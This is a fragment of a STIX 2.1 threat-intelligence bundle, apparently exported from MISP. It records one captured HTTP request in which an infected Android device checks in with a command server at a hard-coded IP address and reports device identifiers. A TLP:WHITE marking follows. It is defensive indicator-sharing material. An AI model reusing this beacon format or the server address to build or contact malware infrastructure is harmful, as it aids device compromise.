|
|
|
|
"x_misp_value": "POST /UlisseREST/api/actions/RequestActionsToExecute HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: application/json\r\nAccept: application/json\r\nUser-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.2; BLU STUDIO 5.0 C Build/KOT49H)\r\nHost: 68.233.237.11\r\nAccept-Encoding: gzip\r\nContent-Length: 475\r\n{\"CommandLine\":\"\",\"CurrentDirectory\":\"\",\"Id\":\"8f4af21e-29fb-48e9-8b52-8cf87fcdec57\",\"LeaID\":\"00000000-0000-0000-0000-000000000000\",\"MachineName\":\"BLU BLU STUDIO 5.0 C BLU STUDIO 5.0 C IMEI: XXXXXXXXXXXXXXX IMSI: null\",\"OsType\":5,\"Platform\":\" Board:BLU STUDIO 5.0 C Brand:BLU Device:BLU STUDIO 5.0 C\",\"Version\":\"Release: 4.4.2 CodeName: REL Inc: eng.android.1441800693 SDK: 19\",\"ServicePack\":\"\",\"SystemDirectory\":\"\",\"UserDomainName\":\"\",\"UserName\":\"android\",\"ProcessorCount\":0}"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "marking-definition",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9",
|
|
|
|
"created": "2017-01-20T00:00:00.000Z",
|
|
|
|
"definition_type": "tlp",
|
|
|
|
"name": "TLP:WHITE",
|
|
|
|
"definition": {
|
|
|
|
"tlp": "white"
|
|
|
|
}
|
|
|
|
}
|
2023-04-21 13:25:09 +00:00
|
|
|
]
|
|
|
|
}
|